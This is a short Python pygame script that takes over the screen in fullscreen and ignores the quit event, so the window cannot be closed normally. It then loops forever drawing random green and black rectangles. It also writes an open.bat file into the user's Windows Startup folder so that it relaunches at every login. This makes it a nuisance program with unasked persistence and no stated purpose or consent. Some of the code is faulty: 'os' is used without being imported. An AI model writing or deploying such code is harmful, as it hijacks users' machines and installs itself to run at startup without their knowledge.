import pygame
from ctypes import *
import getpass
import random

USER_NAME = getpass.getuser()
pygame.init()
sc = pygame.display.set_mode((500, 500), pygame.FULLSCREEN, pygame.NOFRAME)


def add_to_startup(file_path=""):
    if file_path == "":
        file_path = os.path.dirname(os.path.realpath(__file__))
    print(USER_NAME)
    bat_path = 'C:/Users/' + str(USER_NAME) + '/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/'
    #bat_path = bat_path.replace('\', '/')
    f = open(bat_path  + "/open.bat", 'w')
    f.write('start ' + __file__)
    f.close()

w, h = pygame.display.get_surface().get_size()

add_to_startup()

while True:
    for event in pygame.event.get():
        if event.type == pygame.QUIT: pass
    pos_x = random.randint(0, 7000)
    pos_y = random.randint(0, 5000)
    
    pygame.draw.rect(sc, (0, 255, 0), (pos_x, pos_y, random.randint(30, 60), random.randint(30, 60)))
    
    pos_x = random.randint(0, 7000)
    pos_y = random.randint(0, 5000)
    
    pygame.draw.rect(sc, (0, 0, 0), (pos_x, pos_y, random.randint(30, 60), random.randint(30, 60)))
    
    pygame.display.flip()
